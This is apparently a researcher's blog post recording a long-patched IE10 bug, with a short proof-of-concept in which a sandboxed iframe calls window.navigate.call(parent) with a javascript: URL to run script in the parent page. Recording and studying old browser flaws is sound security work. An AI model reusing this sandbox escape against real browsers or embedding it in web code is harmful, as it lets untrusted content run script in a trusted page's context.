IE10 Sandbox Bypass via navigate.call(parent) with JavaScript Protocol

Similar to the window.open.call(parent) technique I found earlier, this variation used the navigate method with a javascript: URL called on behalf of the parent to execute arbitrary code in the parent’s context from inside a sandboxed iframe.

<!-- parent page -->
<iframe sandbox="allow-scripts" src="sandboxed.html"></iframe>

<!-- sandboxed.html -->
<script>
// Modern approach using .call()
window.navigate.call(parent, "javascript:alert(document.body.innerText)");

// Quirks mode equivalent (no .call needed)
// parent.navigate("javascript:alert(document.body.innerText)");
</script>

The navigate method, like open, could be invoked in the context of any accessible window object using .call(). When called on parent, the resulting navigation happened in the parent’s security context, running the javascript: URL without any sandbox enforcement. In quirks mode the method could be called directly on the parent reference without .call at all, since the .call function itself did not exist in older Trident versions.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 Sandbox Multiple Flags Bypass via HTML Object Tag] :: [IE10 DoS: Dragging XML Content Crashes the Browser] >